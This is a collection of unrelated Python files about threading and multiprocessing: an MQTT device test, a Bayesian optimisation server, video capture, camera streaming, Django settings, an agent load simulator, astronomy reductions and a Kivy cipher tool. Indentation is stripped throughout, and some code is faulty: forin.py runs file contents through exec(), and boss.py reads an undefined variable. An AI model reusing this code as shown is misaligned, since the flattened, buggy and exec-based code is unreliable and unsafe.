multiprocessing.Process(name=chef[i], target=chef_challengeMultiProc, args=(synchronizerMultiProc,serializer)).start()
threads = []
print('Lomba Masak Thread Mulai')
for i in range(num_chef):
threads.append(threading.Thread(target=chef_challengeThread))
threads[-1].start()
for thread in threads:
thread.join()
producer = Producer(name='Producer', kwargs={"stat1": 'Berhasil', "stat2": "Kepenuhan", "stat3": "Kosong"})
consumer = Consumer(name='Consumer', kwargs={"stat1": 'Berhasil', "stat2": "Kepenuhan", "stat3": "Kosong"})
producer.start()
consumer.start()
producer.join()
consumer.join()
if __name__ == "__main__":
main()
|
mqtt_tcp_example_test.py
|
import re
import os
import sys
import socket
from threading import Thread
import struct
import time
from tiny_test_fw import DUT
import ttfw_idf
msgid = -1
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def mqqt_server_sketch(my_ip, port):
global msgid
print("Starting the server on {}".format(my_ip))
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(60)
s.bind((my_ip, port))
s.listen(1)
q,addr = s.accept()
q.settimeout(30)
print("connection accepted")
except Exception:
print("Local server on {}:{} listening/accepting failure: {}"
"Possibly check permissions or firewall settings"
"to accept connections on this address".format(my_ip, port, sys.exc_info()[0]))
raise
data = q.recv(1024)
# check if received initial empty message
print("received from client {}".format(data))
data = bytearray([0x20, 0x02, 0x00, 0x00])
q.send(data)
# try to receive qos1
data = q.recv(1024)
msgid = struct.unpack(">H", data[15:17])[0]
print("received from client {}, msgid: {}".format(data, msgid))
data = bytearray([0x40, 0x02, data[15], data[16]])
q.send(data)
time.sleep(5)
s.close()
print("server closed")
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_qos1(env, extra_data):
global msgid
"""
steps: (QoS1: Happy flow)
1. start the broker broker (with correctly sending ACK)
2. DUT client connects to a broker and publishes qos1 message
3. Test evaluates that qos1 message is queued and removed from queued after ACK received
4. Test the broker received the same message id evaluated in step 3
"""
dut1 = env.get_dut("mqtt_tcp", "examples/protocols/mqtt/tcp", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_tcp.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mqtt_tcp_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("mqtt_tcp_size", bin_size // 1024, dut1.TARGET)
# 1. start mqtt broker sketch
host_ip = get_my_ip()
thread1 = Thread(target=mqqt_server_sketch, args=(host_ip,1883))
thread1.start()
# 2. start the dut test and wait till client gets IP address
dut1.start_app()
# waiting for getting the IP address
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
print("writing to device: {}".format("mqtt://" + host_ip + "\n"))
dut1.write("mqtt://" + host_ip + "\n")
thread1.join()
print("Message id received from server: {}".format(msgid))
# 3. check the message id was enqueued and then deleted
msgid_enqueued = dut1.expect(re.compile(r"OUTBOX: ENQUEUE msgid=([0-9]+)"), timeout=30)
msgid_deleted = dut1.expect(re.compile(r"OUTBOX: DELETED msgid=([0-9]+)"), timeout=30)
# 4. check the msgid of received data are the same as that of enqueued and deleted from outbox
if (msgid_enqueued[0] == str(msgid) and msgid_deleted[0] == str(msgid)):
print("PASS: Received correct msg id")
else:
print("Failure!")
raise ValueError('Mismatch of msgid: received: {}, enqueued {}, deleted {}'.format(msgid, msgid_enqueued, msgid_deleted))
if __name__ == '__main__':
test_examples_protocol_mqtt_qos1()
|
async_optimization.py
|
import time
import random
from bayes_opt import BayesianOptimization
from bayes_opt.util import UtilityFunction, Colours
import asyncio
import threading
try:
import json
import tornado.ioloop
import tornado.httpserver
from tornado.web import RequestHandler
import requests
except ImportError:
raise ImportError(
"In order to run this example you must have the libraries: " +
"`tornado` and `requests` installed."
)
def black_box_function(x, y):
"""Function with unknown internals we wish to maximize.
This is just serving as an example, however, for all intents and
purposes think of the internals of this function, i.e.: the process
which generates its outputs values, as unknown.
"""
time.sleep(random.randint(1, 7))
return -x ** 2 - (y - 1) ** 2 + 1
class BayesianOptimizationHandler(RequestHandler):
"""Basic functionality for NLP handlers."""
_bo = BayesianOptimization(
f=black_box_function,
pbounds={"x": (-4, 4), "y": (-3, 3)}
)
_uf = UtilityFunction(kind="ucb", kappa=3, xi=1)
def post(self):
"""Deal with incoming requests."""
body = tornado.escape.json_decode(self.request.body)
try:
self._bo.register(
x=body["params"],
target=body["target"],
)
print("BO has registered: {} points.".format(len(self._bo.space)), end="\n\n")
except KeyError:
pass
finally:
suggested_params = self._bo.suggest(self._uf)
self.write(json.dumps(suggested_params))
def run_optimization_app():
asyncio.set_event_loop(asyncio.new_event_loop())
handlers = [
(r"/bayesian_optimization", BayesianOptimizationHandler),
]
server = tornado.httpserver.HTTPServer(
tornado.web.Application(handlers)
)
server.listen(9009)
tornado.ioloop.IOLoop.instance().start()
def run_optimizer():
global optimizers_config
config = optimizers_config.pop()
name = config["name"]
colour = config["colour"]
register_data = {}
max_target = None
for _ in range(10):
status = name + " wants to register: {}.\n".format(register_data)
resp = requests.post(
url="http://localhost:9009/bayesian_optimization",
json=register_data,
).json()
target = black_box_function(**resp)
register_data = {
"params": resp,
"target": target,
}
if max_target is None or target > max_target:
max_target = target
status += name + " got {} as target.\n".format(target)
status += name + " will to register next: {}.\n".format(register_data)
print(colour(status), end="\n")
global results
results.append((name, max_target))
print(colour(name + " is done!"), end="\n\n")
if __name__ == "__main__":
ioloop = tornado.ioloop.IOLoop.instance()
optimizers_config = [
{"name": "optimizer 1", "colour": Colours.red},
{"name": "optimizer 2", "colour": Colours.green},
{"name": "optimizer 3", "colour": Colours.blue},
]
app_thread = threading.Thread(target=run_optimization_app)
app_thread.daemon = True
app_thread.start()
targets = (
run_optimizer,
run_optimizer,
run_optimizer
)
optimizer_threads = []
for target in targets:
optimizer_threads.append(threading.Thread(target=target))
optimizer_threads[-1].daemon = True
optimizer_threads[-1].start()
results = []
for optimizer_thread in optimizer_threads:
optimizer_thread.join()
for result in results:
print(result[0], "found a maximum value of: {}".format(result[1]))
ioloop.stop()
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = True
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
"""
Class for capturing from a video file, an image sequence, or a camera, and saving video output.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame to output.
config : Dict
Camera and buffer configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
proc_fps : int
Estimated processing speed. This depends on compute and scene complexity.
"""
def __init__(self, size, config, input_uri, output_uri=None, proc_fps=30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.proc_fps = proc_fps
self.resolution = config['resolution']
self.frame_rate = config['frame_rate']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
self.is_live = self.protocol != Protocol.IMAGE and self.protocol != Protocol.VIDEO
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.is_live else 1 / self.cap_fps
def start_capture(self):
"""
Start capturing from file or device.
"""
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
def stop_capture(self):
"""
Stop capturing from file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s is-live=true ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if not self.is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
|
base_camera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until first frame is available
BaseCamera.event.wait()
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
print('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
|
settings_20210906115137.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:50").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(60)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
worker_daemon.py
|
from threading import Thread
import Pyro4
from pbt.network import Daemon
@Pyro4.expose
class WorkerDaemon(Daemon):
def __init__(self, worker):
self.worker = worker
self.pyro_daemon = None
@property
def worker_id(self):
return self.worker.worker_id
def start(self):
self.pyro_daemon = Pyro4.Daemon(host=self._get_hostname())
uri = self.pyro_daemon.register(self)
thread = Thread(target=self.pyro_daemon.requestLoop)
thread.start()
return uri
def ping(self):
return True
def stop(self):
self.worker.stop()
self.pyro_daemon.shutdown()
|
agent_simulator.py
|
import os
import random
import socket
import sys
import time
import multiprocessing
import argparse
import uuid
import yaml
import metric_simulator
from monascaclient import client
from monascaclient import ksclient
from monascaclient import exc
wait_time = 30
no_wait = False
number_of_agents = int(os.environ.get('NUM_AGENTS', '0'))
number_of_containers = int(os.environ.get('NUM_CONTAINERS', '10'))
number_of_metrics = int(os.environ.get('NUM_METRICS', '1310'))
class AgentInfo:
def __init__(self):
pass
keystone = {}
monasca_url = ''
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--number_agents", help="Number of agents to emulate sending metrics to the API", type=int,
required=False, default=30)
parser.add_argument("--run_time",
help="How long, in mins, collection will run. Defaults to run indefinitely until the user hits"
" control c", required=False, type=int, default=None)
parser.add_argument("--no_wait", help="Send measurements as fast as possible", action="store_true")
return parser.parse_args()
def get_token(keystone):
try:
ks_client = ksclient.KSClient(**keystone)
except Exception as ex:
print 'Failed to authenticate: {}'.format(ex)
return None
return ks_client.token
def create_metric_list(process_number, container_names):
metrics = []
for i in xrange(number_of_metrics):
epoch = int(time.time()) - 120
metrics.append({"name": "perf-parallel-" + str(i),
"dimensions": {"perf-id": str(process_number),
"zone": "nova",
"service": "compute",
"resource_id": "34c0ce14-9ce4-4d3d-84a4-172e1ddb26c4",
"tenant_id": "71fea2331bae4d98bb08df071169806d",
"hostname": socket.gethostname(),
"component": "vm",
"control_plane": "ccp",
"cluster": "compute",
"cloud_name": "monasca",
"container": container_names[i % len(container_names)]},
"timestamp": epoch * 1000,
"value": i})
# can make it an argument
percentage_of_known_metrics = 10
known_metric_generator = metric_simulator.generate_metrics()
# insert known metrics randomly into dummy metrics.
# known_metric_generator can generate known_metrics indefinitely
for _ in xrange(number_of_metrics * percentage_of_known_metrics /100):
insert_position = random.randint(0,number_of_metrics-1)
known_metric = known_metric_generator.next()
metrics.insert(insert_position, known_metric)
return metrics
def send_metrics(agent_info, process_number):
container_names = [uuid.uuid4().hex for i in range(number_of_containers)]
if not no_wait:
time.sleep(random.randint(0, 60))
token = get_token(agent_info.keystone)
if token is None:
return
while True:
try:
mon_client = client.Client('2_0', agent_info.monasca_url, token=token)
start_send = time.time()
metrics = create_metric_list(process_number, container_names)
mon_client.metrics.create(jsonbody=metrics)
end_send = time.time()
secs = end_send - start_send
if not no_wait:
time.sleep(wait_time-secs)
except KeyboardInterrupt:
return
except exc.HTTPUnauthorized:
token = get_token(agent_info.keystone)
def parse_agent_config(agent_info):
agent_config_file = open('/etc/monasca/agent/agent.yaml')
agent_config = yaml.load(agent_config_file)
agent_info.keystone['username'] = agent_config['Api']['username']
agent_info.keystone['password'] = agent_config['Api']['password']
agent_info.keystone['auth_url'] = agent_config['Api']['keystone_url']
agent_info.keystone['project_name'] = agent_config['Api']['project_name']
agent_info.monasca_url = agent_config['Api']['url']
def agent_simulator_test():
global no_wait
args = parse_args()
no_wait = args.no_wait
num_processes = number_of_agents or args.number_agents
agent_info = AgentInfo()
parse_agent_config(agent_info)
process_list = []
for i in xrange(num_processes):
p = multiprocessing.Process(target=send_metrics, args=(agent_info, i))
process_list.append(p)
for p in process_list:
p.start()
if args.run_time is not None:
time.sleep(args.run_time * 60)
for p in process_list:
p.terminate()
else:
try:
for p in process_list:
try:
p.join()
except Exception:
pass
except KeyboardInterrupt:
pass
if __name__ == "__main__":
sys.exit(agent_simulator_test())
|
boss.py
|
import numpy as np
import os
import pdb
import matplotlib.pyplot as plt
from pydl.pydlutils import yanny
from pyvista import imred, spectra, sdss
from tools import match,plots
from ccdproc import CCDData
import multiprocessing as mp
def visit(planfile,tracefile=None) :
""" Reduce BOSS visit
Driver for parallell processing of b and r channels
Makes plots of median counts vs mag
"""
# reduce b1 and r1 in parallel
procs=[]
for channel in [0,1] :
kw={'planfile' : planfile, 'channel' : channel, 'clobber' : False}
procs.append(mp.Process(target=do_visit,kwargs=kw))
for proc in procs : proc.start()
for proc in procs : proc.join()
plan=yanny.yanny(planfile)
objs=np.where(plan['SPEXP']['flavor'] == b'science')[0]
fig,ax=plots.multi(1,2)
allmags=[]
allinst=[]
for channel in [0,1] :
mags=[]
inst=[]
for obj in objs :
name=plan['SPEXP']['name'][obj][channel].astype(str)
print(name)
out=CCDData.read(name.replace('sdR','sp1D'))
mapname=plan['SPEXP']['mapname'][obj].astype(str)
if mapname == 'fps' :
plug=sdss.config(out.header['CONFID'],specid=1)
isky=np.where(plug['category'] == b'sky_boss')[0]
else :
plug=sdss.config(os.environ['MAPPER_DATA_N']+'/'+mapname.split('-')[1]+'/plPlugMapM-'+mapname+'.par',specid=1,struct='PLUGMAPOBJ')
isky=np.where(plug['objType'] == b'SKY')[0]
i1,i2=match.match(np.arange(500)+1,plug['fiberId'])
if channel == 0 :
mag='g'
imag=1
else :
mag='i'
imag=3
skyfiber=plug['fiberId'][isky]
sky=np.median(out.data[skyfiber-1,:])
print(len(skyfiber),sky)
rad=np.sqrt(plug['xFocal'][i2]**2+plug['yFocal'][i2]**2)
plots.plotp(ax[channel],plug['mag'][i2,imag],2.5*np.log10(np.median((out.data-sky)/out.header['EXPTIME'],axis=1))[i1],color=None,
zr=[0,300],xr=[10,20],yr=[0,5],size=20,label=name,xt=mag,yt='-2.5*log(cnts/exptime)')
mags.append(plug['mag'][i2,imag])
inst.append(-2.5*np.log10(np.median((out.data-sky)/out.header['EXPTIME'],axis=1))[i1])
ax[channel].grid()
ax[channel].legend()
allmags.append(mags)
allinst.append(inst)
fig.suptitle(planfile)
fig.tight_layout()
fig.savefig(planfile.replace('.par','.png'))
return allmags,allinst
def do_visit(planfile=None,channel=0,clobber=False,nfibers=50) :
""" Read raw image (eventually, 2D calibration and extract,
using specified flat/trace
"""
plan=yanny.yanny(planfile)
# are all files already created?
objs=np.where(plan['SPEXP']['flavor'] == b'science')[0]
for obj in objs :
name=plan['SPEXP']['name'][obj][channel].astype(str)
if not os.path.exists(name) or clobber : done = False
if done : return
# set up Reducer
red=imred.Reducer('BOSS',dir=os.environ['BOSS_SPECTRO_DATA_N']+'/'+plan['MJD'])
# make Trace/PSF
iflat=np.where(plan['SPEXP']['flavor'] == b'flat')[0]
name=plan['SPEXP']['name'][iflat][0][channel].astype(str)
if os.path.exists(name.replace('sdR','spTrace')) and not clobber :
trace=spectra.Trace('./'+name.replace('sdR','spTrace'))
else :
flat=red.reduce(name,channel=0)
trace=spectra.Trace(transpose=red.transpose,rad=3,lags=np.arange(-3,4))
ff=np.sum(flat.data[2000:2100],axis=0)
if channel==0 : thresh=0.4e6
else : thresh=0.2e6
peaks,fiber=spectra.findpeak(ff,thresh=thresh)
print('found {:d} peaks'.format(len(peaks)))
trace.trace(flat,peaks[0:nfibers],index=fiber[0:nfibers])
trace.write(name.replace('sdR','spTrace'))
# reduce and extract science frames
objs=np.where(plan['SPEXP']['flavor'] == b'science')[0]
for obj in objs :
name=plan['SPEXP']['name'][obj][channel].astype(str)
if os.path.exists(name.replace('sdR','sp1D')) and not clobber :
out=CCDData.read(name.replace('sdR','sp1D'))
else :
im=red.reduce(name,channel=channel)
out=trace.extract(im,threads=1,nout=500)
out.write(name.replace('sdR','sp1D'),overwrite=True)
return out
|
threading-simpleargs.py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import threading
def worker(num):
"""thread worker function"""
print 'worker: %s' % num
return
threads = []
for i in range(5):
t = threading.Thread(target=worker, args=(i, ))
threads.append(t)
t.start()
|
forin.py
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.uix.textinput import TextInput
from kivy.uix.gridlayout import GridLayout
from kivy.config import Config
from kivy.uix.switch import Switch
import random
from kivy.lang.builder import Builder
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.scrollview import ScrollView
from kivy.core.window import Window
from kivy.app import runTouchApp
import threading
import os
#Config.set('graphics','resizable','0')#зафиксировать размер окна его нельзя менять
Config.set('graphics','width','655')
Config.set('graphics','height','825')
alfaw=['A','B','C','D','E','F','G','L','J','K','I','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','l','j','k','i','m','n','o','p','q','r','s','t','u','v','w','x','y','z','А','Б','В','Г','Е','Ё','Ж','З','И','Й','К','Л','М','Н','О','П','Р','С','Т','У','Ф','Х','Ц','Ч','Ш','Щ','Ъ','Ы','Ь','Э','Ю','Я','а','б','в','г','д','е','ё','ж','з','и','й','к','л','м','н','о','п','р','с','т','у','ф','х','ц','ч','ш','щ','ъ','ы','ь','э','ю','я',' ',',','.','<','>',':',';','?','/','!','@','#','№','$','|','%','&','*','(',')','-','+','_','=','^','0','1','2','3','4','5','6','7','8','9']
class Подготовить_для_передачи_шифр(App):
def callback(self,instance, value):
#print('the switch', instance, 'is', value)
if self.ghi==False:
self.ghi=True
elif self.ghi==True:
self.ghi=False
def obrabot(self,args):
g=open('shif/0.txt','r')
f=len(g.read())
g.close()
d=random.randint(10*f,69*f)
g=open('kwo.txt','r')
kwo=int(g.read())
g.close()
g=open('shif/kol.txt','r')
kol=int(g.read())
g.close()
alfaw=[]
g=open('layout.txt','r', encoding='utf-8')
fg=str("alfaw += "+g.read())
g.close()
exec(fg)
#print(f,kwo,kol,alfaw)
try:
sm=int(self.ns.text)#количество лживых шифров на шифр каждой буквы
nrsh=int(self.ns1.text)# номер реального шифра
sme=int(self.ns2.text)#смещение шифров
smc=int(self.ns4.text)#сдвиг для шифрования всего цезарем
kss=int(self.ns5.text)#оличество слоёв ддля шиврования цезарем
if sm>0 and nrsh>0 and sme>=0 and smc>=0 and kss>=0:
if nrsh<sm:
if kwo*sm>sme:
if kwo>smc:
if kss<1:
kss=1
loe=[]
#print(loe)
if int(f/2)>2 and self.ghi==1:
self.add_sh_s=random.randint(2,int(f/2))
else:
if self.ghi==1:
self.add_sh_s=random.randint(2,4)
if nrsh==0:
nrsh=1
b=""
k=[]
po=0
n=0
oi=""
vb=""
for e in range(kwo*kol*sm):
if po==sm:
po=0
if po==nrsh:
fv=open('shif/'+str(n)+'.txt','r')
vb=fv.read()
b+=vb
fv.close()
n+=1
if self.ghi==1:
for v in range(self.add_sh_s):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
oi+=alfaw[rop]
k.extend([vb+oi])
vb=""
oi=""
po+=1
else:
po+=1
for jk in range(f):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
oi+=alfaw[rop]
if self.ghi==1:
for v in range(self.add_sh_s):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
oi+=alfaw[rop]
k.extend([oi])
oi=""
if sme>0:
for y in range(len(k)):
if y+sme<len(k):
loe.extend([k[y+sme]])
else:
#kwo-y+sme
loe.extend([k[(-1*(len(k)-y))+sme]])
b=""
for l in range(len(loe)):
b+=loe[l]
for v in range(d):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
gj=open('shif for shipment/шифр.txt','w')
gj.write(b)
gj.close()
self.ns3.text=b
self.kah.text=str(self.add_sh_s)
gl=""
